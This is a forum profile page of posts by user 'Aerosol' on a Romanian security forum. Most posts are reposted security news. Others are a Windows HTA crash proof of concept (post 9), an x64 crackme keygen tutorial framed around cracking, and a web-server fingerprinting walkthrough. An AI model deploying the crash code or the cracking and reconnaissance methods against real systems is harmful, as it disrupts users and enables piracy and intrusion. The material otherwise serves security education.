Everything posted by Aerosol

  1. Today anywhere you go, you will come across Free or Public WiFi hotspots -- it makes our travel easier when we are stuck without a data connection. Isn't it? But, I think you'll agree with me when I say: this Free WiFi hotspot service could get you into trouble, as it could be a bait set up by hackers or cyber criminals to get access to devices that connect to the free network. This is why mobile device manufacturers provide an option in their phone settings so that the device does not automatically connect to any unknown hotspot and asks the owner for approval every time it comes across a compatible WiFi.

    Hackers can grab your Credit Card Data. Here's How?

    Recently, security researchers from mobile security company 'Wandera' have alerted Apple users about a potential security flaw in the iOS mobile operating system that could be exploited by hackers to set up a rogue WiFi spot and then fool users into giving up their personal information, including credit card details. The loophole leverages the weakness in the default behaviour of iOS devices, including iPhones, iPads and iPods, with WiFi turned on, Ars reported. This could let attackers create their malicious wireless hotspots and inject a fake "captive portal" page mimicking the genuine Apple Pay interface, asking users to enter their credit card details. A hacker near a customer conducting an Apple Pay transaction could launch an attack in an attempt to force the victim's mobile to connect to the evil hotspot and then display a popup portal page which is designed in such a way that users could be fooled into believing Apple Pay itself is requesting them to re-enter their Credit Card details. According to the researchers, spoofers can loaf around a point-of-sale (POS) machine with an Apple Pay terminal and could continuously launch the attack in order to victimize more people.

    However, the attack may not trick a large number of people, because the fake captive portal page imitating the Apple Pay interface is displayed under a fairly prominent "Log In" title bar, the report says. The simplest and easiest workaround to prevent such attacks is to turn your device's Wi-Fi OFF if you are not intentionally connecting to a known wireless network. Security researchers have warned Apple about the loophole and meanwhile recommended that Apple and Google should "consider adopting a secure warning when displaying captive portal pages to users so that users exercise caution." Source
  2. Today everybody wants to know — Who visited my Facebook profile?, Who unfriended me from my Facebook friend list?, Who saw my Facebook posts?, and many other things that aren't provided by Facebook by default. So most Facebook users try to find software for it and fall victim to one that promises to accomplish their desired task. Hackers make use of this weakness and often design malicious programs in order to victimize a broad audience. Below I am going to disclose the realities behind one such piece of software, designed cleverly to trick Facebook users into believing it is genuine.

    UnfriendAlert, a free application that notifies you whenever someone removes you from your Facebook friend list, has been found collecting its users' Facebook credentials.

    UnfriendAlert Stealing your Facebook Credentials:

    Security researchers at Malwarebytes have warned users of the UnfriendAlert app, saying that the notorious app asks users to log in with their Facebook credentials to activate unfriend monitoring and the alert service for your Facebook profile. Facebook provides an OAuth API login system for third-party applications, where users don't need to hand their Facebook credentials to them. So you should never submit your Facebook password to any third-party service or desktop software in any case. Once you enter your login credentials, UnfriendAlert will send them to the website "yougotunfriended.com" owned by the attackers. Late last month, UnfriendAlert was also classified as a potentially unwanted program (PUP), which often displays unwanted advertisements and deceptively installs other malicious software and free apps when visiting some web pages in Chrome, Firefox, and Internet Explorer, leaving you unable to block them.

    Uninstall UnfriendAlert and Change your Password Now!

    So users are recommended to uninstall the UnfriendAlert app from their computer, and besides removing it, you are also advised to change your Facebook password as soon as possible. You can do this under "Settings —> Password —> Edit." Always do some research before installing any third-party application, as one single mistake could compromise your online security and privacy in various ways. Source
  3. That's how it is; the gesture counts, what they offer isn't that important. I received a total of 5 packages from them. Rude on their part, what can I say, not everyone is the same. Link#1: https://rstforums.com/forum/99793-xss-olx-ro.rst Link#2: https://rstforums.com/forum/99416-2x-xss-olx-ro-reward.rst I kept searching and reporting because I really enjoyed "working with them". They responded/fixed the problem quickly + good manners. @lupulaurentiu as long as you receive something, it counts as bug bounty.
  4. Aerosol

    Fun stuff

    @TheTime I gave you everything you need in PM; if needed I can also give an administrator a PoC. x2:// true, the picture is unclear and I was wrong about the vector, I will take another screenshot. X3:// updating the picture now. Thanks for the heads-up anyway.
  5. I found it a while ago. I reported it directly on FB, I didn't bother sending an email. "Reward": 1 pen, 1 notebook, 1 USB stick (4GB), a greeting card...
  6. America takes photobombing REALLY seriously Medieval butcher bastards ISIS are adept at using the web to lure Western followers to their warped cause – but the internet can turn around and bite back. Air Force General Hawk Carlisle, head of US Air Combat Command, told a conference that analysts at the 361st Intelligence, Surveillance and Reconnaissance Group spotted a selfie snapped and posted online by an ISIS fighter standing outside a command-and-control building in the Mid East. "The [airmen are] combing through social media and they see some moron standing at this command," Carlisle said at the speech, Air Force Times reports. "And in some social media, open forum, bragging about command and control capabilities for Da'esh. And these guys go 'ah, we got an in.'" According to the general, the analysts worked out the position of the building based on the information posted online, and 22 hours later the Air Force paid a visit, dropping three Joint Direct Attack Munitions (JDAM) – dumb iron bombs fitted with fins and a guidance package for precision strikes – on the building, destroying it. "Through social media. It was a post on social media. Bombs on target in 22 hours," Carlisle said. "It was incredible work, and incredible airmen doing this sort of thing." On Wednesday, US Congress's House Homeland Security Committee heard that ISIS is flooding social networking websites with propaganda, reaching thousands of potential recruits to their evil cause. At those briefings, Michael Steinbach, assistant director in the FBI's Counterterrorism Division, claimed Apple and Google's use of encryption was helping ISIS by hiding their communications from view. Based on this latest case, ISIS is doing a pretty good job of making it easy for Uncle Sam to spot them. Source
  7. We live in the social mobile era, where we all collect and share vast amounts of data about ourselves and others. By handing over that data to corporations and governments we are promised great benefits in everything from our health and our wealth to our safety from criminals. But of course there are dangers too and I've been hearing some horror stories about when Big Data becomes Big Brother. The first was from one of the technology industry's more colourful figures. John McAfee, who is in London this week for the Infosecurity Europe conference, is the man who virtually invented the anti-virus industry. He sold his stake in McAfee more than 20 years ago and has since had numerous adventures, culminating in his flight from Belize in 2012 after police in the Central American state tried to question him about a murder. He was described by Belize's prime minister at the time as "extremely paranoid, even bonkers". So, perhaps not surprising, that the Infosecurity crowd who gathered to hear him speak were treated to dire warnings about the threat to their security from two sources - their mobile phones and their governments. But of course just because you are paranoid it does not mean they are not out to get you, and when I meet John McAfee after his speech he gives a perfectly coherent account of why we should be worried. We are now all carrying around smartphones, he explains, but security has not caught up with the fact that they are very advanced computers which can be used to spy on us if we install any number of untested apps that may have been created by people with criminal intent. But it's government spying on those phones that really worries him. He cheers the brake which the Senate applied to the US government's surveillance powers at the weekend, but fears that in Britain no such limits are in place. In particular, he rails against any attempt to try to crack the encryption that protects many personal messages. 
When I suggest that there might be a need to know what criminals and terrorists are planning, he bats that away: "We have lived with criminals for ever - does that mean we should all have to suffer?" He compares encryption with whispering a message in your wife's ear and asks whether we would have thought it justified years ago to ban whispering. "If it sounds insane for government to say you are not allowed to whisper to your wife - it is insane." And he says the big technology companies should have the courage to stand up to governments on this issue: "If enough people stand up the government will back down." When I suggest delicately that his colourful past might make people disinclined to take him seriously, he bats that straight back at me. "My colourful life implies that I've done some serious things," he says, explaining that his experiences in Belize have shown him just how dangerous a rogue government can be. You can hear my interview with John McAfee on Tech Tent, which this week comes live from the Cheltenham Science Festival. Here too, the question of what we are doing with our data has been a major theme. Last night I was the moderator at an event called Big Data, Big Brother, where the panel expressed their worries about the uses to which our data could be put, in front of an audience which shared their fears. The lawyer Marion Oswald mentioned the Samaritans' Radar Twitter app as an example of where public data posted by people who might or might not have been suicidal could have been used in a questionable way without their consent. A software engineer Martyn Thomas advised us to be wary of claims that data was anonymised, explaining how easy it was to identify someone once you had pieced together just a few data points. Here in the home of GCHQ, the audience seemed more concerned about corporate surveillance than government spies, and many were enthusiastic about ad-blocking software and other means of throwing the likes of Google off your trail.
But afterwards in the more relaxed setting of the Festival's Ideas Cafe, data scientists from Warwick University reminded us of the positive aspects of their work. I sat at a table where a computer scientist explained how he was mapping London to spot which areas should be targeted for diabetes prevention measures. He was using data from a variety of sources, including a credit rating agency, to examine lifestyles and hence vulnerability to Type 2 diabetes. While some will be concerned about how medical and financial data are combined in this way, many will see the benefits of applying data science to this kind of task. As the Big Data gold rush continues, lawyers, ethicists and consumer groups are all going to have their work cut out to help us get a good balance between the risks and rewards of crunching the numbers. Source
  8. A security software firm has warned about a new strain of "ransomware" - while finding that even Russian hackers can be haggled down. Ransomware is software which locks you out of your files until a fee is paid to the criminals behind the attack. Checkpoint researcher Natalia Kolesova detailed information about Troldash, a newly-discovered strain. Once it infects a machine, Troldash provides an email address with which to contact the attackers. "While the most ransom-trojan attackers try to hide themselves and avoid any direct contact," Ms Kolesova explained, "Troldesh's creators provide their victims with an e-mail address. The attackers use this email correspondence to demand a ransom and dictate a payment method." Troldash was distributed via a spam email - and once downloaded, immediately set to work encrypting files before placing a text file of ransom instructions on the target's computer. Posing as a victim named Olga, the researcher contacted the scam artist, and received a reply with instructions to pay 250 euros to get the files back. Suspecting the reply was automated, Ms Kolesova pressed for a more human response, asking more details about how to transfer the money, and pleading with the hacker to not make them pay. Responding in Russian, the scammer offered to accept 12,000 roubles, a discount of around 15%. After Ms Kolesova pleaded further, the email response read: "The best I can do is bargain." Eventually the unknown man or woman was talked into accepting 7,000 roubles - 50% less than the first demand. "Perhaps if I had continued bargaining, I could have gotten an even bigger discount," Ms Kolesova concluded. Ransomware is a particularly vicious problem for many victims around the world. One strain, Cryptolocker, was said to have infected more than 250,000 computers worldwide. Another variant locked users out of their favourite games unless they paid a fee. 
The company did not pay the ransom - and recommended that up-to-date security software designed to protect against ransomware and other attacks was a better approach. Source
  9. /*
     #[+] Author: Mohammad Reza Espargham
     #[+] Title: MS Windows HTA (HTML Application) - Crash PoC
     #[+] Date: 19-05-2015
     #[+] Tested on: Win7
     dash> save below code as Crash.hta file and Double Click on it
     Crash...
     */
     <html>
     <head><title>Mohammad Reza Espargham</title></head>
     <body onload="javascript:ReZa();"></body>
     <script>
     function ReZa() {
         var buffer  = '\x43';
         var buffer1 = '\x42';
         var buffer2 = '\x41';
         // buffer is appended to itself on every pass, so it doubles each
         // iteration and document.write() is fed an exponentially growing string
         for (var i = 0; i < 956; i++) {
             buffer += buffer + '\x42';
             document.write('<>' + buffer + buffer1 + buffer2);
         }
     }
     </script>
     </html>

     Source

     @alinpetre it has only just appeared on packetstorm; check for yourself before commenting.
  10. Introduction

    GammaRay is a software introspection tool for Qt applications developed by KDAB. Leveraging the QObject introspection mechanism it allows you to observe and manipulate your application at runtime. This works both locally on your workstation and remotely on an embedded target. Augmenting your instruction-level debugger, GammaRay allows you to work on a much higher level, with the same concepts as the frameworks you use. This is especially useful for the more complex Qt frameworks such as model/view, state machines or scene graphs.

    Among other things GammaRay can:

      • Browse the QObject tree with live updates.
      • View, and to some extent, edit QObject static and dynamic properties.
      • View and call slots of a QObject.
      • View other QObject elements such as signals, enums and class infos.
      • List all QObject inbound and outbound signal/slot connections.
      • Provide a layout information overlay for QWidget applications.
      • Inspect all QPainter operations used to draw a specific widget.
      • Browse the QtQuick2 item tree and scenegraph.
      • Plot object lifetime and emitted signals.
      • View the content of any QAbstractItemModel. Very useful when debugging a proxy model chain, for example.
      • Browse the QAbstractProxyModel hierarchy.
      • Browse the item tree of any QGraphicsView scene.
      • Show a live preview of QGraphicsView items, including showing their coordinate system, transformation origin, rotate/zoom/pan, etc.
      • Intercept translations and change them at runtime.
      • Inspect all building blocks of a QStyle.
      • Act as a complete JavaScript debugger, attachable to any QScriptEngine (including the usually not accessible one used by QtQuick1 internally).
      • Perform HTML/CSS/DOM/JS introspection/editing/profiling on any QWebPage, thanks to QWebInspector.
      • Browse the QResource tree and its content.
      • Browse QStateMachines, along with their states and transitions.
      • Show all registered meta types.
      • Show all installed fonts.
      • Show all available codecs.
      • Browse all QTextDocuments, along with the ability to edit them and view their internal structures.
      • Show all QTimers and their statistics (number of wakeups, wakeup time, ...)

    Link: https://github.com/KDAB/GammaRay
  11. Aerosol


    Hello and welcome!
  12. rstforums.com packetstormsecurity.com resources.infosecinstitute.com krebsonsecurity.com There are a lot of them.
  13. Keygenning is the process of finding a valid key for a program. It is used for cracking/piracy. Most of the cracking has been documented on x86; there haven't been many articles on x64 cracking. In this article, we will show you how to keygen a Linux x64 application on a Linux computer. For this purpose we will use:

    1: Linux machine (64-bit Mint box)
    2: EDB debugger
    3: IDA disassembler
    4: Compiler to write a key generator
    5: Fill out the form below for the files associated with this article

    Let's run the file command to check the type of file.

        $ file r5
        r5: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.24, BuildID[sha1]=86bf854ce620288567d153883d4609163485d34d, not stripped

    From the output, we see the build version, and that it is a dynamically linked file.

        ~/Desktop $ nm r5
        0000000000601109 B __bss_start
        00000000006010e0 D buf
        000000000040069d T check_password
        0000000000601109 b completed.6972
        0000000000601060 D __data_start
        0000000000601060 W data_start
        00000000006010a0 D delta
        00000000004005e0 t deregister_tm_clones
        0000000000400650 t __do_global_dtors_aux
        0000000000600e18 t __do_global_dtors_aux_fini_array_entry
        0000000000601068 D __dso_handle
        0000000000600e28 d _DYNAMIC
        0000000000601109 D _edata
        0000000000601110 B _end
        0000000000400894 T _fini
        0000000000400670 t frame_dummy
        0000000000600e10 t __frame_dummy_init_array_entry
        0000000000400a80 r __FRAME_END__
        0000000000601000 d _GLOBAL_OFFSET_TABLE_
                         w __gmon_start__
        0000000000400500 T _init
        0000000000600e18 t __init_array_end
        0000000000600e10 t __init_array_start
        00000000004008a0 R _IO_stdin_used
                         w _ITM_deregisterTMCloneTable
                         w _ITM_registerTMCloneTable
        0000000000600e20 d __JCR_END__
        0000000000600e20 d __JCR_LIST__
                         w _Jv_RegisterClasses
        0000000000400890 T __libc_csu_fini
        0000000000400820 T __libc_csu_init
                         U __libc_start_main@@GLIBC_2.2.5
        00000000004007b6 T main
        0000000000601080 D master
                         U printf@@GLIBC_2.2.5
                         U puts@@GLIBC_2.2.5
                         U random@@GLIBC_2.2.5
        0000000000400610 t register_tm_clones
        00000000004005b0 T _start
                         U strcmp@@GLIBC_2.2.5
                         U strcpy@@GLIBC_2.2.5
                         U strlen@@GLIBC_2.2.5
        0000000000601110 D __TMC_END__

    x64 assembly basics

    x64 consists of an extended register set, and some extra instructions are added as well. Following is the list of added registers in x64: r8, r9, r10, r11, r12, r13, r14, r15. The lower 32 bits of r8 can be accessed by r8d, the lower 16 bits by r8w and the lower 8 bits by r8b; moreover, RIP (the instruction pointer) can be directly accessed. All the registers in x64 are 64 bits in size. RIP is also 64-bit, but current implementations only support 48-bit linear addresses. In addition to the normal registers it also added SSE registers, namely xmm8 – xmm15. If any data movement operation is performed on EAX, it zero-extends the higher 32 bits of the RAX register. Some added instructions are lodsq, stosq etc.

    For the purpose of debugging, we will use an x64 debugger known as EDB on Linux. This debugger is similar to OllyDbg (Windows) and is quite easy to use. Following is the default pane of EDB.

    Argument passing in x64 is quite different from x86: arguments are passed in the registers RDI, RSI, RDX, RCX, r8 and r9; the rest of the parameters are passed on the stack. Navigation is simple, just like OllyDbg.

    Running our crackme file just like that gives us the following output:

        ~/Desktop $ ./r5
        Usage: ./r5 password
        Maybe plaintext isn't good after all.

    Which gives us a hint that it requires a password, which we have to figure out. Opening it in a disassembler gives us an idea of what is happening around. Apparently it is looking for a parameter and is passing it to a function. Clearly you can see that it is passing argv[1] as a parameter to the function check_password().

    The first hint is about the length of the input string, which should be equal to the length of "this_is_not_even_interesting_its_garbage":

        .data:00000000006010E0 ; char buf[]
        .data:00000000006010E0 buf db 'this_is_not_even_interesting_its_garbage',0
        .data:00000000006010E0 ; DATA XREF: check_password+1C#o
        .data:00000000006010E0 ; check_password+3C#o ...
        .data:00000000006010E0 _data ends
        .data:00000000006010E0
        .bss:0000000000601109 ; ===========================================================================

    and is checked here:

        call    _strlen         ; Call Procedure
        mov     rbx, rax
        mov     edi, offset buf ; "this_is_not_even_interesting_its_garbag"...
        call    _strlen         ; Call Procedure
        cmp     rbx, rax        ; Compare Two Operands
        jz      short Go        ; Jump if Zero (ZF=1)

    After that, this string is replaced by our own input string:

        mov     rax, [rbp+passcode]
        mov     rsi, rax        ; src
        mov     edi, offset buf ; "this_is_not_even_interesting_its_garbag"...
        call    _strcpy         ; Call Procedure
        mov     [rbp+VarCheck], 1
        jmp     loc_400791      ; Jump

    After this operation the program goes into a loop, and the loop body is skipped if the value at the index of the variable delta is zero:

        movzx   eax, delta[rax]

    If not, it performs some mathematical operations on the input string leveraging delta and other parameters, which can be represented in C as:

        x = (random() % delta[index]) + 1;
        delta[index] = delta[index] - x;
        var_check = var_check ^ (unsigned int)delta[index];

    The random() call is not initialized with srand(), so it can be predicted easily. Finally, after the 40 rounds of the loop, the mutated string is compared against "this_aint_that_simple_but_good_luck_haha" and if it is equal, the "password OK" message is printed.

    Now to calculate that string we can perform the exact opposite on this string to get our key. We can use the following C program to do so.

        #include <stdio.h>
        #include <stdlib.h>   /* random() */
        #include <string.h>   /* strcpy() */

        /* delta[] table as dumped from the crackme's .data section */
        unsigned char delta[] = { 3, 253, 3, 249, 0, 3, 6, 0, 241, 0, 250, 7, 22, 235, 8, 252, 246, 2, 254, 243, 4, 19, 1, 234, 237, 15, 253, 240, 242, 15, 12, 243, 241, 12, 7, 0, 5, 14, 10, 4, };
        unsigned char buff[48];

        int main(int argc, char **argv)
        {
            int index = 0;
            int var_check = 1;
            unsigned char x = '\x00';

            /* start from the string the binary compares against ... */
            strcpy((char *)buff, "this_aint_that_simple_but_good_luck_haha");

            /* ... and replay the binary's loop, adding x where it subtracts it.
               random() is never seeded, so this consumes exactly the sequence
               check_password() consumes */
            while (var_check) {
                index = 0;
                var_check = 0;
                while (index < 40) {
                    if (delta[index]) {
                        x = (random() % delta[index]) + 1;
                        delta[index] = delta[index] - x;
                        var_check = var_check ^ (unsigned int)delta[index];
                        buff[index] = buff[index] + x;
                    } /* if zero */
                    index++;
                }
            }
            printf("%s\n", buff);
            return 0;
        }

    Compiling and running this program gives us the following output: "well_done_now_go_on_irc_and_ask_for_more"

        ~/Desktop $ ./r5 "well_done_now_go_on_irc_and_ask_for_more"
        password OK

    Source
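As an added example (not the article's own code), the same keygen in Python with glibc's default, unseeded random() sequence reimplemented, so the key can be derived on any platform without libc. The delta table and target string are those from the article; check_password() is a reconstruction that assumes the binary subtracts x where the keygen adds it.

```python
"""Added example: the crackme never calls srand(), so glibc random() always
returns the same TYPE_3 sequence (seed 1).  Re-implementing that generator
lets the keygen run anywhere.  The delta[] table and target string are the
article's; check_password() is an assumed reconstruction of the binary."""

# delta[] table as dumped from the crackme's .data section in the article
DELTA = [3, 253, 3, 249, 0, 3, 6, 0, 241, 0, 250, 7, 22, 235, 8, 252, 246, 2,
         254, 243, 4, 19, 1, 234, 237, 15, 253, 240, 242, 15, 12, 243, 241, 12,
         7, 0, 5, 14, 10, 4]
TARGET = b"this_aint_that_simple_but_good_luck_haha"
BUF_LEN = 40  # strlen("this_is_not_even_interesting_its_garbage")


def glibc_random(seed=1):
    """Yield the values glibc random()/rand() return for the given seed.
    Classic TYPE_3 additive-feedback generator: 31-word state seeded by a
    Park-Miller LCG, r[i] = r[i-31] + r[i-3] (mod 2^32), first 344 values
    discarded, 31 high bits returned."""
    r = [0] * 344
    r[0] = seed
    for i in range(1, 31):
        r[i] = (16807 * r[i - 1]) % 2147483647   # libc does this in 64-bit
        if r[i] < 0:                             # only for negative seeds
            r[i] += 2147483647
    for i in range(31, 34):
        r[i] = r[i - 31]
    for i in range(34, 344):
        r[i] = (r[i - 31] + r[i - 3]) & 0xFFFFFFFF
    while True:
        r.append((r[-31] + r[-3]) & 0xFFFFFFFF)
        yield r[-1] >> 1


def _mutate(buf, delta, rng, direction):
    """Run the article's loop over a bytearray: per byte, draw x from the
    generator, shrink delta[i] by x, and move the byte by +x (keygen) or -x
    (assumed check) until the XOR of the remaining deltas is zero."""
    delta = list(delta)          # copy: both sides must start from the table
    var_check = 1
    while var_check:
        var_check = 0
        for i in range(BUF_LEN):
            if delta[i]:
                x = (next(rng) % delta[i]) + 1
                delta[i] -= x
                var_check ^= delta[i]
                buf[i] = (buf[i] + direction * x) & 0xFF
    return buf


def keygen(target=TARGET, delta=DELTA):
    """Reverse the check: start from the string the binary compares against
    and apply the same per-byte steps in the opposite direction."""
    buf = bytearray(target)
    return bytes(_mutate(buf, delta, glibc_random(), +1)).decode()


def check_password(password, target=TARGET, delta=DELTA):
    """Assumed reconstruction of the crackme's check_password(): the length
    must match buf, then the input is stepped toward the target string."""
    if len(password) != BUF_LEN:
        return False
    buf = bytearray(password.encode())
    return bytes(_mutate(buf, delta, glibc_random(), -1)) == target


if __name__ == "__main__":
    key = keygen()
    print(key)
    print("password OK" if check_password(key) else "password FAIL")
```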
  14. When performing a Web Application Security Assessment, an important step is Fingerprinting, which allows for further exploitation by an attacker. So as a security researcher/pentester, we should do well at fingerprinting the web server, which gives a lot of information like application name, software version, web server info, OS, and more. This helps with known vulnerabilities, researching vulnerabilities and exploiting. So here I will discuss some techniques which are required for this task:

    Fingerprint Methodology

    How to perform this activity: obviously for an attacker there is no hard and fast rule to perform this operation. For pentesting we will discuss some methods below.

    HTTP Header Banner Grabbing

    The most basic form of identifying a web framework is to gather the basic architecture like application name and server banner, which will be more helpful for banner grabbing.

    Banner grabbing by Netcat: So we got AkamaiGhost, which is a load balancer that prevents fingerprinting.

    Banner grabbing by Telnet: Here we got a lot of information about the application and server for further exploitation.

    By Nmap: Using some Nmap commands we can also enumerate information about application and web server fingerprinting. If you want to know more about Nmap please click here.

    By sending a malformed HTTP Header request/Junk request

    Review by inspecting cookies

    Crawling cookies can reveal lots of information about the application. See the below example:

        Host: resources.infosecinstitute.com
        User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:37.0) Gecko/20100101 Firefox/37.0
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        Accept-Language: en-US,en;q=0.5
        Accept-Encoding: gzip, deflate
        Referrer: http://www.google.co.in/url?sa=t&rct=j&q=&esrc=s&source=web&cd=2&ved=0CCYQjBAwAQ&url=http%3A%2F%2Fresources.infosecinstitute.com%2Fnmap-cheat-sheet%2F&ei=JCpCVaK1Mo-wuASe1YC4Cg&usg=AFQjCNFYlxcvuiEFw2QCg-9_e6R-M76_9Q&sig2=y9KWwXGOOQ_bVpfKw-fiaA&bvm=bv.92189499,d.c2E&cad=rja
        Cookie: __utma=192755314.2098953166.1427376874.1427376874.1427376874.1; __utmz=192755314.1427376874.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=(not%20provided); visitor_id12882=216943492; __distillery=v20150227_1ce95eb6-6db3-422d-8dfe-497a0e3b3b7f; _ga=GA1.2.2098953166.1427376874; X-Mapping-fjhppofk=767BD7CA2B9E38F518B95F35B5326A01
        Connection: keep-alive

    Automation and Tools Implementation

    Here we will discuss some of the tools which can be of further use for fingerprinting. We will discuss them one by one.

    Whatweb: Currently Whatweb is the most important tool for fingerprinting in Kali Linux. It includes the below features:

      • Text strings (case sensitive)
      • Regular expressions
      • Google Hack Database queries (limited set of keywords)
      • MD5 hashes
      • URL recognition
      • HTML tag patterns
      • Custom ruby code for passive and aggressive operations

    See the below screenshot.

    BlindElephant: Blind Elephant is an open-source generic web application fingerprinter that produces results by examining a small set of static files. Basically it is called static fingerprinting. It searches the file name for file extensions developed by the Python library and gives the fingerprint result. Fire up the below command to install:

        svn co https://blindelephant.svn.sourceforge.net/svnroot/blindelephant/trunk blindelephant

    Follow the below pictures. Scan the target with the below command:

    Plugin Support: With the –p switch we can search for a plugin, like the below command for WordPress:

        Blindelephant.py –s –p guess target plugin
        python BlindElephant.py -u target

    Actually it scans for static files, version no., config file. The best candidate for fingerprinting is checking the checksum of the file, like with the hashing method. Some others are below:

      • Css file
      • Js file
      • .ini file
      • En-GB ini file

    and many more.

    Extending support for Python

    From a hacker's perspective, we need customized fingerprinting and our function should support it. Though it is open source, we can do customization. Check the below snippet of code:

        $python
        >>> from blindelephant.Fingerprinters import WebAppFingerprinter
        >>>
        >>> #Construct the fingerprinter
        >>> #use default logger pointing to console; can pass "logger" arg to change output
        >>> fp = WebAppFingerprinter("http://laws.qualys.com", "movabletype")
        >>> #do the fingerprint; data becomes available as instance vars
        >>> fp.fingerprint()
        (same as above)
        >>> print "Possible versions:", fp.ver_list
        Possible versions: [LooseVersion ('4.22-en'), LooseVersion ('4.22-en-COM'), LooseVersion ('4.23-en'), LooseVersion ('4.23-en-COM')]
        >>> print "Max possible version: ", fp.best_guess
        Max possible version: 4.23-en-COM

    Wappalyzer

    Website: Wappalyzer

    Wappalyzer is a Firefox/Chrome plug-in. It works only on regular expression matching and doesn't need anything other than the page to be loaded in the browser. It works completely at the browser level and gives results in the form of icons. Sometimes it may give a false positive, so be careful when using this tool.

    Desenmascara.me

    This is an online tool for extracting information. It reveals lots of info including web server info, application info and known vulnerabilities.

    httprint – the advanced HTTP fingerprinting engine

    This uses static analysis with a signature file that contains a different header file for different types of servers.

        ./httprint -s signatures.txt -o apache1.html -h apache.example.com

      -s  signature file for the different http headers
      -o  output to a file
      -h  host

    HTTP Recon

    httprecon project / download

    This is an all-in-one project which provides fingerprinting and reporting. It involves five tabs which help security testers refine the results during fingerprinting. See the image below. We got lots of information from here.

    NetCraft

    Another all-in-one tool is NetCraft, which is an online tool. We can grab various information by using this tool. Netcraft Extension - Phishing Protection and Site Reports

    References

    An Introduction to HTTP Fingerprinting
    Wappalyzer
    http://blindelephant.sourceforge.net/

    Source
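As an added example (not from the article), a small offline fingerprinter that applies the banner-grabbing and cookie-inspection checks described above to a raw HTTP response, the kind of thing to run against your own server's responses to see what they leak. The sample response is constructed; the cookie-name and header mappings are the common, publicly documented defaults and are assumptions, not something the article states.

```python
"""Added example: apply banner-header and cookie-name fingerprinting to a raw
HTTP response.  The response and cookie values below are constructed."""
import re

# Constructed sample: a response as a netcat/telnet banner grab would show it
SAMPLE_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Server: Apache/2.2.22 (Ubuntu)\r\n"
    "X-Powered-By: PHP/5.3.10-1ubuntu3\r\n"
    "Set-Cookie: PHPSESSID=c0nstructed; path=/\r\n"
    "Set-Cookie: X-Mapping-fjhppofk=ABCDEF; path=/\r\n"
    "Content-Type: text/html\r\n"
    "\r\n"
    "<html><body>hi</body></html>"
)

# Headers whose mere presence names the stack (assumed common set)
BANNER_HEADERS = ("server", "x-powered-by", "x-aspnet-version", "x-generator", "via")

# Default session / affinity cookie names and the technology they imply (assumed)
COOKIE_HINTS = {
    "phpsessid": "PHP",
    "jsessionid": "Java servlet container",
    "asp.net_sessionid": "ASP.NET",
    "cfid": "ColdFusion",
    "cftoken": "ColdFusion",
}
COOKIE_PREFIX_HINTS = {
    "x-mapping-": "load balancer affinity cookie (Riverbed Stingray / Zeus)",
}


def parse_response(raw):
    """Split a raw HTTP response into (status line, [(name, value), ...]).
    Header names are lower-cased; duplicates such as Set-Cookie are kept."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    headers = []
    for line in lines[1:]:
        if ":" not in line:
            continue          # tolerate junk lines a real grab may contain
        name, value = line.split(":", 1)
        headers.append((name.strip().lower(), value.strip()))
    return lines[0], headers


def fingerprint(raw):
    """Return {'status', 'banners', 'cookies', 'versions'} for a response.
    'versions' lists every product/version pair found in banner headers,
    which is exactly the detail a hardened server should not expose."""
    status, headers = parse_response(raw)
    result = {"status": status, "banners": {}, "cookies": {}, "versions": []}
    for name, value in headers:
        if name in BANNER_HEADERS:
            result["banners"][name] = value
            # product/version tokens such as Apache/2.2.22 or PHP/5.3.10
            result["versions"] += re.findall(
                r"([A-Za-z.\-]+)/([0-9][0-9A-Za-z.\-]*)", value)
        elif name == "set-cookie":
            cookie = value.split("=", 1)[0].strip().lower()
            if cookie in COOKIE_HINTS:
                result["cookies"][cookie] = COOKIE_HINTS[cookie]
            else:
                for prefix, hint in COOKIE_PREFIX_HINTS.items():
                    if cookie.startswith(prefix):
                        result["cookies"][cookie] = hint
    return result


def leaks_versions(raw):
    """True when any banner header exposes a product version; the fix is on
    the server side (e.g. Apache 'ServerTokens Prod', PHP 'expose_php = Off')."""
    return bool(fingerprint(raw)["versions"])


if __name__ == "__main__":
    for key, val in fingerprint(SAMPLE_RESPONSE).items():
        print(f"{key}: {val}")
```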
  15. WHEN ROSS ULBRICHT was sentenced to life in prison without parole last Friday, the judge in his case made clear that her severe punishment wasn’t only about Ulbricht’s personal actions in creating the Silk Road’s billion-dollar drug market. As Judge Katherine Forrest told the packed courtroom, she was also sending a message to any would-be online drug kingpins who might follow in his footsteps. “For those considering stepping into your shoes,” she said, “they need to understand without equivocation that there will be severe consequences.” But despite Ulbricht’s ultimate punishment, the lesson for anyone closely watching the Dark Web drug trade has hardly been one of inevitable consequences. As independent researcher Gwern Branwen has documented in an ongoing survey of more than 70 Dark Web drug markets created after Ulbricht founded the Silk Road, only five of those sites’ administrators have been arrested. For many of the others, the security model Ulbricht pioneered—using Tor and bitcoin to protect administrators, buyers and sellers—has successfully kept law enforcement fumbling in the shadows. In fact, the difficulty of laying hands on Dark Web drug market creators was one reason Ulbricht’s prosecutors asked for a lengthy sentence. If law enforcement can’t apprehend all Ulbricht imitators, went prosecutors’ argument, it had better compensate with harsher punishment for those it does catch. “Although the Government has achieved some successes in combating these successor dark markets, they continue to pose investigative challenges for law enforcement,” read the prosecution’s letter. “To the extent that would-be imitators may view the risk of being caught to be low, many are still likely to be deterred if the stakes are sufficiently high.” When Ross Ulbricht begins his life sentence at a federal prison in the coming weeks, in other words, he won’t just be serving his own time. 
